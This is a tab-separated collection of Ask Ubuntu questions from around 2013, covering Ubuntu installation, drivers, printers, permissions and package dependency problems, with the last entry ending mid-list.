401953	when extracting an iso , it warns of low disk space , but i have 15 gigs at least . no idea what to do	i 'm using ubuntu 12.04 . i tried bleachbit , tweak , and all sorts of things . i removed old kernels , orphan files , cleared cache , just almost everything you can think of . i deleted programs , and games i do n't even use . i 'm trying to extract a windows 8 iso , and put the files on a bootable usb stick . no matter what i do , nothing works . after a few minutes it 'll warn of low disk space , and it 'll stop . when i run mount it gives /dev/loop0 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda2 on /host type fuseblk ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 ) gvfs-fuse-daemon on /home/mastershadow/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=mastershadow ) /dev/sdb1 on /media/43845e1d0505bfd7 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda5 on /media/01ce2f72c1774740 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda3 on /media/presario_rp type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda1 on /media/3c066ec0066e7b32 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) > when i run df-h i get filesystem size used avail use % mounted on /dev/loop0 9.3g 2.7g 6.1g 31 % / udev 742m 4.0k 742m 1 % /dev tmpfs 301m 872k 300m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 751m 156k 750m 1 % /run/shm /dev/sda2 26g 11g 16g 41 % /host /dev/sdb1 15g 65m 15g 1 % /media/43845e1d0505bfd7 /dev/sda5 7.9m 3.9m 4.0m 50 % /media/01ce2f72c1774740 /dev/sda3 4.1g 54m 4.0g 2 % /media/presario_rp /dev/sda1 62g 60g 2.6g 96 % /media/3c066ec0066e7b32
401954	replace packaged install with one from source	ubuntu currently only has a package for openipmi 2.0.18 - i need openipmi 2.0.19 or later . how should i go about replacing the ubuntu package with one from the openipmi source itself ? i am planning on : apt-get remove openipmi and then for the latest openipmi ./configure make make install is this the correct procedure ?
401957	how to backup files without access to the desktop ?	i recently made a driver change and now when i boot all i get is a black screen . i want to reinstall ubuntu 12.04 lts without losing all of my data and files in my /home folder . how can i create a backup of my /home folder without access to my desktop ? note : i am able to access the grub menu but i do n't know where to go from there .
401959	ubuntu battery on dv5220us	tech info : os : ubuntu 12.04 lts , memory : 993.1 mib processer intel ( r ) cpu t2050 ( dual core ) @ 1.6 ghz ( 1600mhz ) , os:32 bit ... . im using an hp pavillion dv5220us i have a clean install ( was done within a day of this post ) i am not dual booting my ubuntu system claims left and right that im down to 6 % battery and then fter charging for like 70min jumps to 100 % it takes it 10 min on the charger just makes it to 7 % ... it always displays either 6 % ,7 % , and 100 % any idea as to if this is a bug or what ... ill post whatever data is needed
401962	when turning on/off wifi , wifi is `` soft blocked '' , any way to automatically run `rfkill unblock` ?	so , on this dell inspiron 7520 , which is hardware-certified for 12.04 , when i use the function keys to turn off/on the wifi , the wifi will `` turn on '' but be soft blocked . running rfkill unblock [ interfacenumber ] does correctly unblock the device . is there a way for the system to automatically run rfkill unblock [ interfacenumber ] to remove the soft block when the wifi card is reenabled by the function keys ? my question here , though , is different than the other already-asked questions about soft blocks that i could find , so please do not mark it as a duplicate . i am simply asking how to automate the unblocking process . the device is not a broadcom card , and never will be . that does not appear to be the source of the soft block when the function keys are pressed and the wifi card comes back up . from lspci : 08:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) requested xev | grep key output from when i am using the hardware key ( s ) to turn off/on the wifi card : % xev | grep key keys : 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 state 0x0 , keycode 36 ( keysym 0xff0d , return ) , same_screen yes , state 0x0 , keycode 248 ( keysym 0x0 , nosymbol ) , same_screen yes , state 0x0 , keycode 248 ( keysym 0x0 , nosymbol ) , same_screen yes , request mappingkeyboard , first_keycode 8 , count 248 state 0x0 , keycode 246 ( keysym 0x1008ff95 , xf86wlan ) , same_screen yes , state 0x0 , keycode 246 ( keysym 0x1008ff95 , xf86wlan ) , same_screen yes ,
401967	is it safe to disable the guest account in 12.04 lts	tech info : os : ubuntu 12.04 lts , memory : 993.1 mib processer intel ( r ) cpu t2050 ( dual core ) @ 1.6 ghz ( 1600mhz ) , os:32 bit ... . im using an hp pavillion dv5220us is it safe to disable the guest account on ubuntu using the following method : by default ubuntu 12.04 comes with guest account.you can disable this account using the following procedure.guest account is a paswordless account which allow users to get access to ubuntu machine open /etc/lightdm/lightdm.conf file from your terminal using the following command gksudo gedit /etc/lightdm/lightdm.conf add the following line allow-guest=false save and exit the file after adding the above line you should see similar to the following in lightdm.conf file [ seatdefaults ] user-session=ubuntu greeter-session=unity-greeter allow-guest=false finally you have to restart lightdm using the following command from your terminal sudo restart lightdm
401968	installing ubuntu on ipad 1 ?	so , i might be getting an old ipad 1 to tinker with and had been doing my daily question/answer reviews and came across this question : how can i install ubuntu on an ipad ? . the device is so old i doubt it would run many official app store apps , so i thought i would give ubuntu a try . does anyone know if this is feasible today ? i would want to know if it is doable , useable , and legal ( kind of confused as of this : http : //www.computerworld.com/s/article/9232937/iphone_jailbreaking_still_legal_in_us_but_don_39_t_meddle_with_an_ipad ? source=ctwnle_nlt_dailyam_2012-10-26 ) i looked at the idroid project page and it looks like the ipad 1 has been cracked enough to provide cpu control , but i 'm really ca n't figure out the chart : http : //www.idroidproject.org/wiki/status # ipad while getting ubuntu desktop to work on the ipad would be a fun project , getting ubuntu touch would also be fun . if anyone has any links/sites regarding the ipad 1 running ubuntu touch , those would also be great . i know there is n't an official build of ubuntu touch , just the google nexus devices are supported that way . this would be a sweet summer project , so if anyone knows of any sites that have this working , that would be stupendous !
401974	i ca n't install ubuntu and kubuntu 13.10	please , i ca n't install ubuntu and kubuntu 13.10 . when i click to test operating system , my screen turn black in five seconds and my computer restart . ( i tested all configurations in bios . ) asus z87m-plus , i5 4670k , 2x 4g kingston 1600 , corsair neutron 256 , 2x ati radeon hd7850 out hdmi . thanks , i read the solutions to fix the problem . i try with -nomodeset- the system restart . i try with all options uefi off in bios , the system restart . i try with csm compatibility on , the system restart . i try with all grub options , acpi etc etc , the system restart , with secureboot off , system restart . i do n't know to try it more . please .
401977	help with directory ownership/permissions for apache	i 've been using ubuntu linux for a couple years now but i still have trouble with permissions . i need to setup my web server for production . the root web directory should always be accessible by apache and me ( i login to ftp with my account ) as well ( if possible ) by my cgi applications . i would like to hear your ideas of the best way to set something up like this in production . maybe what i 've suggested is n't the best way to set this up even . if there 's a better way to set things up for production ( i plan to be using cgi scripts and compiled cgi binaries )
401978	how can i install spe ( stani 's python editor ) for python3.3	i have ubuntu 13.10.i have spe which runs for python2.7.4+.but i need to run it for python 3.3.2+.how can i do it.my system uses python2.7.4+ by default .
401979	problem installing hp wireless printer	i have an hp5510 wireless printer that i have been using for a year or two . i have no problems connecting to it with both my current laptop running 12.04lts and my wife 's windows 8 hp laptop . i recently installed ubuntu 13.10 as a dual boot on my wife 's hp with minimal hassle . however , i simply can not get this bloody printer to work with 13.10 ! i have tried simply adding the printer through the printers section of ubuntu . it is unable to find the printer when it scans . when i manually enter the ip address of the printer it then finds the printer and recognizes it as an hp5510-d series printer . i click add and it goes to the next screen where it starts to install , pauses for roughly three seconds , and then pops up a dialogue saying `` unable to install printer '' with no further explanation . i 've done this maybe a dozen times with the same result . i downloaded and installed the current hplip , but that did not help at all . i even downloaded and installed the hplip gui tool . using that tool i try to add a wireless printer but it insists that i first cable to the printer . nope . i 've had this printer for quite some time . i 'm sure it came with a cable but ... nope . and why would i need a usb cable to connect to a printer that is already online ! is n't that just for initializing the printer ? ! ? ! ? anyway , i appear to be stuck . any suggestions that do n't involve purchasing a usb cable simply to connect to ubuntu for 90 seconds in order to install a printer that it is able to connect with wirelessly when i give it the ip address ? i 've spent years telling my wife how much easier everything is in ubuntu as opposed to windows , and right now this is killing my credibility .
401982	i have 2 versions of adobe reader	i once installed reader from the adobe website . it was full of bugs and did n't come with text in the menu so i decided to uninstall it and install a different version . i tried : sudo apt-get autoremove acroread sudo apt-get remove acroread sudo apt-get purge acroread in the end the program still stayed on my computer and managed to launch . then i installed nearly the same version of reader from the software center . the one from the software center worked perfectly but i still have the buggy version . how do i remove it ? i have tried searching for it in the software center but did n't find it there . thankfully pdf documents open with the new version but when i search the program in the launcher , i see 2 exact icons of reader .
401984	no default or ui configuration directive found !	i am trying to get ubuntu 12.04.3 onto a blank hdd , and it says error : no configuration file found , i have tried to rename the files and that hasnt worked , any other suggestions ? i am on a laptop using windows 7 , and i used unetbootin to put it on my 16gb flash drive .
401987	persistent dual-monitor configuration on kde4	i am using kde on a laptop with ubuntu 12.04 . in the office i am using an additional monitor for work . when i leave the office , i take my laptop with me . my issue is that kde can not remember my dual-monitor setup the next day . on ubuntu unity this is not an issue . it always remembers the configuration . has anybody here found a way to get around this issue ? i need it to be persistent so that i do n't have to do this each day . thanks . : ) edit : ubuntu - 12.04.3 kde - 4.12.0 i am using the kubuntu-ppa/backports for precise . note : kde has system settings > display and monitor > size and orientation to handle multiple monitor setup .
401994	unable to install apache2	i installed apache2 using command sudo apt-get install apache2 in ubuntu 13.10 and got the following the error . dpkg : error processing apache2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : apache2 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
402000	second hard drive does not appear in the ubuntu installer , `` installation type '' screen	i have two hard drives installed on my laptop . one has windows 8.1 installed and i want to put ubuntu ( 13.10 ) on the second drive . i partitioned 200gb of space from the second drive . when the installation reaches the `` installation type '' portion , i only see the windows drive . `` /dev/sda '' . i do not see the second drive . how can i remedy this ? thanks in advance !
402001	graphics driver for ubutu 12.04	my laptop is a toshiba tecra m9 , running ubuntu 12.04 . when i unplug my laptop from charger it freezes and i can not do anything . i need to restart it every time to get it to work correctly again.when i installed addition driver from system settings it did n't freeze any more.but the problem is it takes lot of time to switch between windows and opening g edit windows.is this a problem of my graphics driver ? can anybody please help me to find right graphics driver for my laptop . in settings it shows my current graphics driver is quadro nvs 130m/pci/sse2 please help me ... .
402003	detect server status in network	i want a script ( python / shell ) to detect machine status ( up / down ) in a local network . up == you can ping machine down == can not ping i am completely newbie here.your kind help is much appreciated
402004	upgrading mythtv from 0.25 to 0.27 fails	i 'm using ubuntu 12.10 . i installed mythtv from the software center which installed 0.25 . that version is no longer supported so i opted to install 0.27 using the following commands : sudo add-apt-repository ppa : mythbuntu/0.27 sudo apt-get update sudo apt-get install mythtv install result : mythtv is already the newest version . the following packages were automatically installed and are no longer required : apache2-mpm-prefork apache2-utils apache2.2-common libapache2-mod-php5 libctemplate2 libzip2 mysql-utilities php-mythtv php5 php5-cli php5-common php5-mysql python-mysql.connector python-pysqlite2 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . my mythtv version is still 0.25 . i have tried deleting mysql and mythtv several times and reinstalling mythtv again using the above code but can not get 0.27 to install . synaptic package manager does n't show any upgrades for mythtv . what the heck is going on ? how can i upgrade mythtv ?
402005	not able to install ubuntu 13.10	i downloaded ubuntu 13.10 . i have n't used ubuntu previous versions . i read about it and want to use it . i downloaded ubuntu 13.10 burned it to dvd . i restarted my laptop with ubuntu 13.10 dvd and it was not detected . i restarted it and choose the option to boot from dvd . it booted but when i choose install with windows 7 . it ejects dvd and restarted . i have done it many time but no progress . specification of my computer : windows 7 , 32-bit and 2 gb ram . i downloaded ubuntu 13.10 32 bit . any solution ? guys ... .help me out . rabi
402009	got a single header line over 360 chars - `` sudo apt-get update ''	i installed ubuntu a while ago . recently , i ran the following command - sudo apt-get update and got the error err http : //security.ubuntu.com precise-security release.gpg got a single header line over 360 chars i read through multiple discussion forum posts and nothing has been helpful in solving this issue . i am connected to the internet through wifi . i am able to ping the ubuntu servers . i am also able to the file servers from firefox browser . my internet connection works fine . i 'm a rookie user of ubuntu . so , please be as specific in your instructions as possible . given below is the complete error message - $ sudo apt-get update ign http : //security.ubuntu.com precise-security inrelease err http : //security.ubuntu.com precise-security release.gpg got a single header line over 360 chars ign http : //us.archive.ubuntu.com precise inrelease ign http : //us.archive.ubuntu.com precise-security inrelease ign http : //security.ubuntu.com precise-security release ign http : //us.archive.ubuntu.com precise-updates inrelease 22 % [ connecting to server ( 67.215.65.132 ) ] [ connecting to server ( 67.215.65.132 '' got a single header line over 360 chars '' error message apparently has something to do with ubuntu 12.04 ( according to various discussion forums ) . any help in resolving the issue will be greatly appreciated . being a rookie user , i am not able to figure out all the system details myself to resolve the issues .
402010	copy to pen drive - input/output error	i 'm using ubuntu 12.04 and having the following problem . i thought it might be a problem of my pen drive . but now i realise that it is n't . because i tried with other pen drives and same problem is happening . the problem is , when i tried to copy files to the pen drive , sometimes this dialogue box appear : error while copying `` hello world.mkv '' . there was an error copying the file into /media/c00c-e613 . error splicing file : input/output error and if i use the command lsusb in terminal , it 's like no usb device is connected . shouumma @ shouumma-l2700 : ~ $ lsusb bus 003 device 002 : id 2635:0601 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub i 'm using ubuntu 12.04 for about 6 months and i 'm still new to it . i really getting frustrated with the problem . any kind of help would be really appreciated .
402013	can i run ubuntu touch on my device ?	i have a question for ubuntu touch un-support phone device . i have got device phone , but i have checked for ubuntu running movie via youtube . so , i want to know for unsupport android device setup . and my phone device hardware satisfy the system ( entry level ubuntu smartphone ) requirements . it is check through http : //www.ubuntu.com/phone/operators-and-oems so , , first , can i installation ubuntu touch ? second , if you do not installation , installed on all android devices , do you have any support plan ? thanks ubuntu ,
402016	fetching the kernel source code using git	i am having ubuntu 12.04 installed on my pc . heena @ heena : ~ $ uname -r 3.8.0-29-generic also heena @ heena : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise following suggestions from how do i get the kernel source code ? i am issuing the following command to get the source code of the kernel : git clone git //kernel.ubuntu.com/ubuntu/ubuntu-precise.git but my doubt is how does the above command know i have to download the kernel version 3.8.0-29-generic ? the above command is not having such version ? is this command for downloading just kernel or the whole ubuntu ? i am interested only in kernel . also in which folder the source is being downloaded , that is also not clear to me . update to be precise my doubts will be cleared if someone can help me know : which version of kernel will be downloaded from the above command ?
402020	how to enable administrator account	i made a new account and set its type as administrator . without setting password . and made my account ( which was administrator earlier ) as standard . now , i m not able to access as admin . its showing unable . please help .
402025	use < tab > to autocomplete with vim plugin autocomplpop	so i installed this plugin http : //www.vim.org/scripts/script.php ? script_id=1879 in vim which allows your vim to automatically opens popup menu for completions when you enter characters or move the cursor in insert mode . but to choose one of the proposed completion you have to tap `` enter '' , and i really used to tap `` tab '' in the usual ide ( like code blocks ) to use the autocompletion . so here is my question : is there a way to configure this plugin to use the `` tab '' to insert a completion ? ? ? ? ps : i 'm using ubuntu 13.04
402028	numerical performance of intel 's 4th generation vs 3rd generation cpu 's on thinkpad	maybe a stupid question , but any feedback would be appreciated ! i just purchased a new pc in order to run the latest haswell cpu on some numerical benchmarks . to my surprise , i found that the exact same benchmark codes run only equally fast or even 2 times slower on the new pc . benchmarks are compiled with gcc/g++ and executed under identical settings . my old machine : xubuntu 12.04 , thinkpad w510 with intel i7-820qm cpu ( 3rd generation ) my new machine : xubuntu 13.10 , thinkpad e540 with intel i7-4702mq cpu ( 4th generation ) my question is , what is the reasons for this experience ? do i overlook something or is this a xubuntu , lenovo or intel issue ? thanks !
402029	how should i install cups-pdf from source ?	on ubuntu 12.10 , i want to install cups-pdf . using apt-get install cups-pdf works okay , but i want to install it in code source . this is what i 've tried : download code from http : //www.physik.uni-wuerzburg.de/~vrbehr/cups-pdf/src/ build cups-pdf : gcc -o cups-pdf `cups-config -- cflags` cups-pdf.c `cups-config -- libs` run the following : cp cups-pdf /usr/lib/cups/backend/ cp ../extra/cups-pdf.conf /etc/cups cp ../extra/cups-pdf_opt.ppd /usr/share/cups/model/cups-pdf_opt.ppd lpadmin -p pdfprinter -e -v cups-pdf : / -p /usr/share/cups/model/cups-pdf_opt.ppd lpadmin -d pdfprinter try to print a file to pdf : lp hello.c nothing happened
402031	i am unable to list the chipset while using airmon-ng	i am new to ubuntu . i want to use aircrack-ng . when i run airmon-ng i am getting interface and driver ( i think so ) but not chipset . so please anyone tell me a step by step description how i can run aircrack-ng successfully . i am posting the result which i got when i ran it.terminal result
402033	boot loader problem	i have installed ubuntu 12.04 on my computer . the install went fine but now the boot does n't load and when i reset my computer the windows starts . i want a dual boot . please help me .
402036	problem with httpie on ubuntu 13.10	i am using ubuntu 13.10 . i installed httpie ( using apt-get ) , but when i try to use it i 'm getting the following error message : traceback ( most recent call last ) : file `` /usr/bin/http '' , line 5 , in < module > from pkg_resources import load_entry_point file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2809 , in < module > parse_requirements ( __requires__ ) , environment ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 594 , in resolve raise distributionnotfound ( req ) pkg_resources.distributionnotfound : requests > =0.10.1 , < 1.0 any suggestions ?
402044	creating a bootable iso for windows	hey guys i 've been trying for the last 3 hours to work out how to get winusb to get this onto my usb but it keeps giving me failed when i try i thought it was permissions so i tried chmod 777 but it still would n't have it here are the errors any help is appreciated installation failed ! exit code : 512 log : formating device ... mounting ... mount : block device /james/windows_8.1_pro_x64_activated_final/windows_8.1_pro_x64_activated.iso is write-protected , mounting read-only copying ... error occured ! syncing ... cleaning ... /usr/bin/winusb : line 78 : 14111 terminated while true ; do sleep 0.05 ; echo 'pulse ' ; done umounting and removing '/media/winusb_iso_1389165798_11743 ' ... umount : /media/winusb_iso_1389165798_11743 : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umounting and removing '/media/winusb_target_1389165798_11743 ' ...
402045	file and folder permissioins	i have an ubuntu file server ( samba ) sharing a folder structure with a windows 7 computer classroom . all users use the same user/pass to access the folders and have read/write permissions . i would like to prevent users from moving or deleting folders , but keep the file permissions . in other words , i would like to protect my folder structure , but allow users to add/delete/rename/move files within that structure . for example : file server has the follwing folder structure : /share/classes classes folder has class1 class2 folders and each class folder has user1 user2 folders so the full path to the user folders would be : /share/classes/class1/user1 i would like for users to be able to add/delete/rename/move file in classes folder and below , but prevent them from add/delete/rename/move of folders . how can i do that ? thanks !
402046	laggy radeon hd 7670m graphics on ubuntu 12.04	i have a notebook ( dell 3521 ) with a radeon hd 7670m gpu and i 'm using pcsx 2 for playing playstation 2 games . when i play on windows it 's completely fine . but when i play on ubuntu it 's so laggy . i have amd catalyst cc and selected the high performance gpu . what is the problem here ?
402054	laptop battery not charging even though ubuntu says it does .	i have acquired an advent 7048 laptop now running ubuntu 12.04 lts . the battery is recognised and says it is charging but is n't . the laptop runs ok on just the charger . the battery is new , and seems ok . so the problem is either with ubuntu or the charging circuitry . any ideas please ?
402056	compare qtcreator v.2.7.2 with ubuntu sdk	i 'm used to qtcreator . must i switch to ubuntu sdk in order to develop apps for smartphones/tablets or can i develop the same just using qtcreator .
402059	ldap login error -- -- - can not find name for group id	i configured ldap server and ldap client on ubuntu box . ldap client easily authenticate through ldap server , but it give error `` can not find name for group id '' . at client side , getent passwd username give output , but getent group groupname not give any output . please look /etc/nsswitch.conf file : - entry is- passwd : files ldap group : files ldap shadow : files ldap
402060	how to make onboard show only when no keyboard is connected ?	i have a surface pro , and would it would be convenient if the onscreen keyboard appeared when i remove the type cover . it would be even better if this were compatible with the `` auto-show when editing text '' feature , so onboard would show only if there is no keyboard and the user is editing text . this would duplicate the functionality of android and ios .
402061	ubuntu 12.04 pixelated screen in between login screen and appearance of the desktop	i 've posted this problem here and hope to get a fix , but until now still no result , so i 'm trying here too . i hope there is a linux pro here who can help me out . i 've do some searching here on this forum , the closest result i can get is here but did n't get the real fix . after i reinstalled ubuntu due to i 've messed up the system previously on some trial and error , i got a weird pixelated screen after my login but before the desktop appear . other than that is no problem , i can do all my thing such as watching movie , playing steam games , etc . i really hope to fix this annoying problem so i can convince my friend to try switch to linux . attachment 001 , the boot screen , no problem . attachment 002 , the login screen , no problem . attachment 003-01 , after i 've type in my password and log in , the pixelated screen problem appear every time if i shutdown my laptop on the previous session . attachment 003-02 , this pixelated screen problem appear if i restart my laptop on the previous session . attachment 004 , after the pixelated screen , the desktop appear , no problem . i 've searched for the fix on ubuntu forums , ask ubuntu and google as well , but i ca n't find any relevant problem like mine ( maybe i 've overlooked them due to i 'm not an expert user on linux ) . i only get those weird checkerboard boxes , or when doing installation process , or deformed text . my laptop specifications : asus a45v series , intel core i7 single os , ubuntu 12.04lts only nvidia geforce gt 645m
402063	can not write to hfs+	i have a journaled hfs+ usb-drive ubuntu native ( it has never been in direct contact with a mac ) . i created the drive with gparted and i use it to backup a macdrive with rsync -avz /macdrive/ /mydrive the macdrive is mounted using open-iscsi this has worked a couple of times . after a reboot , it turns out that i can no longer mount the hfs+ drive in rw-mode . it just mounts read-only , which is useless if i am using it as a backup drive . nevertheless , i can still mount the macdrive with open-iscsi both rw and ro . any help ? what happened ? thanks , mnatiello
402066	steam needs libgl1-mesa-dri : i386 , libgl1-mesa-glx : i386	i have just installed steam on my ubuntu 13.10 64 bit and it works well and i can play games but each time i launch it i get the following prompt : steam needs to install these additional packages : libgl1-mesa-dri : i386 , libgl1-mesa-glx : i386 [ sudo ] password for user : ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-dri : i386 : depends : libdrm-intel1 : i386 ( > = 2.4.38 ) but it is not going to be installed depends : libdrm-nouveau2 : i386 ( > = 2.4.38 ) but it is not going to be installed depends : libdrm-radeon1 : i386 ( > = 2.4.31 ) but it is not going to be installed depends : libdrm2 : i386 ( > = 2.4.38 ) but it is not going to be installed depends : libglapi-mesa : i386 but it is not going to be installed libgl1-mesa-glx : i386 : depends : libdrm2 : i386 ( > = 2.3.1 ) but it is not going to be installed depends : libglapi-mesa : i386 ( = 9.2.1-1ubuntu3 ) but it is not going to be installed depends : libx11-6 : i386 ( > = 2:1.4.99.1 ) but it is not going to be installed depends : libxcb-dri2-0 : i386 ( > = 1.8 ) but it is not going to be installed depends : libxcb-glx0 : i386 ( > = 1.8 ) but it is not going to be installed depends : libxcb1 : i386 but it is not going to be installed depends : libxdamage1 : i386 ( > = 1:1.1 ) but it is not going to be installed depends : libxext6 : i386 but it is not going to be installed depends : libxfixes3 : i386 but it is not going to be installed depends : libxxf86vm1 : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . press return to continue : i have done the following : sudo dpkg -- add-architecture i386 sudo apt-get update but no change whatsoever . edit $ sudo apt-get check reading package lists ... done building dependency tree reading state information ... done edit $ apt-cache policy libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libgl1-mesa-dri : i386 : installed : ( none ) candidate : 9.2.1-1ubuntu3 version table : 9.2.1-1ubuntu3 0 500 http : //archive.ubuntu.com/ubuntu/ saucy/main i386 packages libgl1-mesa-glx : i386 : installed : ( none ) candidate : 9.2.1-1ubuntu3 version table : 9.2.1-1ubuntu3 0 500 http : //archive.ubuntu.com/ubuntu/ saucy/main i386 packages edit after sudo apt-get install aptitude & & sudo aptitude install libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 the following new packages will be installed : libdrm-intel1 : i386 { ab } libdrm-nouveau2 : i386 { ab } libdrm-radeon1 : i386 { ab } libdrm2 : i386 { ab } libelf1 : i386 { a } libexpat1 : i386 { a } libffi6 : i386 { a } libgl1-mesa-dri : i386 { b } libgl1-mesa-glx : i386 { b } libglapi-mesa : i386 { ab } libllvm3.3 : i386 { a } libpciaccess0 : i386 { a } libtxc-dxtn-s2tc0 : i386 { a } libx11-6 : i386 { a } libx11-xcb1 : i386 { a } libxau6 : i386 { a } libxcb-dri2-0 : i386 { ab } libxcb-glx0 : i386 { ab } libxcb1 : i386 { ab } libxdamage1 : i386 { a } libxdmcp6 : i386 { a } libxext6 : i386 { a } libxfixes3 : i386 { a } libxxf86vm1 : i386 { a } zlib1g : i386 { a } 0 packages upgraded , 25 newly installed , 0 to remove and 0 not upgraded . need to get 13,8 mb of archives . after unpacking 45,0 mb will be used . the following packages have unmet dependencies : libxcb-dri2-0 : breaks : libxcb-dri2-0 : i386 ( ! = 1.10-1~xedgers~saucy1 ) but 1.9.1-3ubuntu1 is to be installed . libxcb-dri2-0 : i386 : breaks : libxcb-dri2-0 ( ! = 1.9.1-3ubuntu1 ) but 1.10-1~xedgers~saucy1 is installed . libdrm-intel1 : breaks : libdrm-intel1 : i386 ( ! = 2.4.50+git20140102.e8cbc579-0ubuntu0ricotz~saucy ) but 2.4.46-1ubuntu1 is to be installed . libdrm-intel1 : i386 : breaks : libdrm-intel1 ( ! = 2.4.46-1ubuntu1 ) but 2.4.50+git20140102.e8cbc579-0ubuntu0ricotz~saucy is installed . libgl1-mesa-dri : breaks : libgl1-mesa-dri : i386 ( ! = 10.1.0~git20140102.5a51c1b0-0ubuntu0ricotz~saucy ) but 9.2.1-1ubuntu3 is to be installed . libgl1-mesa-dri : i386 : breaks : libgl1-mesa-dri ( ! = 9.2.1-1ubuntu3 ) but 10.1.0~git20140102.5a51c1b0-0ubuntu0ricotz~saucy is installed . libdrm-radeon1 : breaks : libdrm-radeon1 : i386 ( ! = 2.4.50+git20140102.e8cbc579-0ubuntu0ricotz~saucy ) but 2.4.46-1ubuntu1 is to be installed . libdrm-radeon1 : i386 : breaks : libdrm-radeon1 ( ! = 2.4.46-1ubuntu1 ) but 2.4.50+git20140102.e8cbc579-0ubuntu0ricotz~saucy is installed . libxcb1 : breaks : libxcb1 : i386 ( ! = 1.10-1~xedgers~saucy1 ) but 1.9.1-3ubuntu1 is to be installed . libxcb1 : i386 : breaks : libxcb1 ( ! = 1.9.1-3ubuntu1 ) but 1.10-1~xedgers~saucy1 is installed . libglapi-mesa : breaks : libglapi-mesa : i386 ( ! = 10.1.0~git20140102.5a51c1b0-0ubuntu0ricotz~saucy ) but 9.2.1-1ubuntu3 is to be installed . libglapi-mesa : i386 : breaks : libglapi-mesa ( ! = 9.2.1-1ubuntu3 ) but 10.1.0~git20140102.5a51c1b0-0ubuntu0ricotz~saucy is installed . libxcb-glx0 : breaks : libxcb-glx0 : i386 ( ! = 1.10-1~xedgers~saucy1 ) but 1.9.1-3ubuntu1 is to be installed . libxcb-glx0 : i386 : breaks : libxcb-glx0 ( ! = 1.9.1-3ubuntu1 ) but 1.10-1~xedgers~saucy1 is installed . libgl1-mesa-glx : breaks : libgl1-mesa-glx : i386 ( ! = 10.1.0~git20140102.5a51c1b0-0ubuntu0ricotz~saucy ) but 9.2.1-1ubuntu3 is to be installed . libgl1-mesa-glx : i386 : breaks : libgl1-mesa-glx ( ! = 9.2.1-1ubuntu3 ) but 10.1.0~git20140102.5a51c1b0-0ubuntu0ricotz~saucy is installed . libdrm-nouveau2 : breaks : libdrm-nouveau2 : i386 ( ! = 2.4.50+git20140102.e8cbc579-0ubuntu0ricotz~saucy ) but 2.4.46-1ubuntu1 is to be installed . libdrm-nouveau2 : i386 : breaks : libdrm-nouveau2 ( ! = 2.4.46-1ubuntu1 ) but 2.4.50+git20140102.e8cbc579-0ubuntu0ricotz~saucy is installed . libdrm2 : breaks : libdrm2 : i386 ( ! = 2.4.50+git20140102.e8cbc579-0ubuntu0ricotz~saucy ) but 2.4.46-1ubuntu1 is to be installed . libdrm2 : i386 : breaks : libdrm2 ( ! = 2.4.46-1ubuntu1 ) but 2.4.50+git20140102.e8cbc579-0ubuntu0ricotz~saucy is installed . the following actions will resolve these dependencies : remove the following packages : 1 ) gir1.2-totem-1.0 2 ) gnome-contacts 3 ) gnome-control-center 4 ) gnome-control-center-datetime 5 ) gnome-control-center-signon 6 ) gnome-control-center-unity 7 ) gstreamer1.0-clutter 8 ) gstreamer1.0-plugins-bad 9 ) indicator-bluetooth 10 ) libcheese-gtk23 11 ) libcheese7 12 ) libclutter-1.0-0 13 ) libclutter-gst-2.0-0 14 ) libclutter-gtk-1.0-0 15 ) libcogl-pango12 16 ) libcogl12 17 ) libegl1-mesa 18 ) libegl1-mesa-drivers 19 ) libgbm1 20 ) libgl1-mesa-dri 21 ) libgstreamer-plugins-bad1.0-0 22 ) libtotem0 23 ) libxatracker1 24 ) ubuntu-desktop 25 ) xorg 26 ) xserver-xorg-glamoregl 27 ) xserver-xorg-video-all 28 ) xserver-xorg-video-vmware keep the following packages at their current version : 29 ) libdrm-intel1 : i386 [ not installed ] 30 ) libdrm-nouveau2 : i386 [ 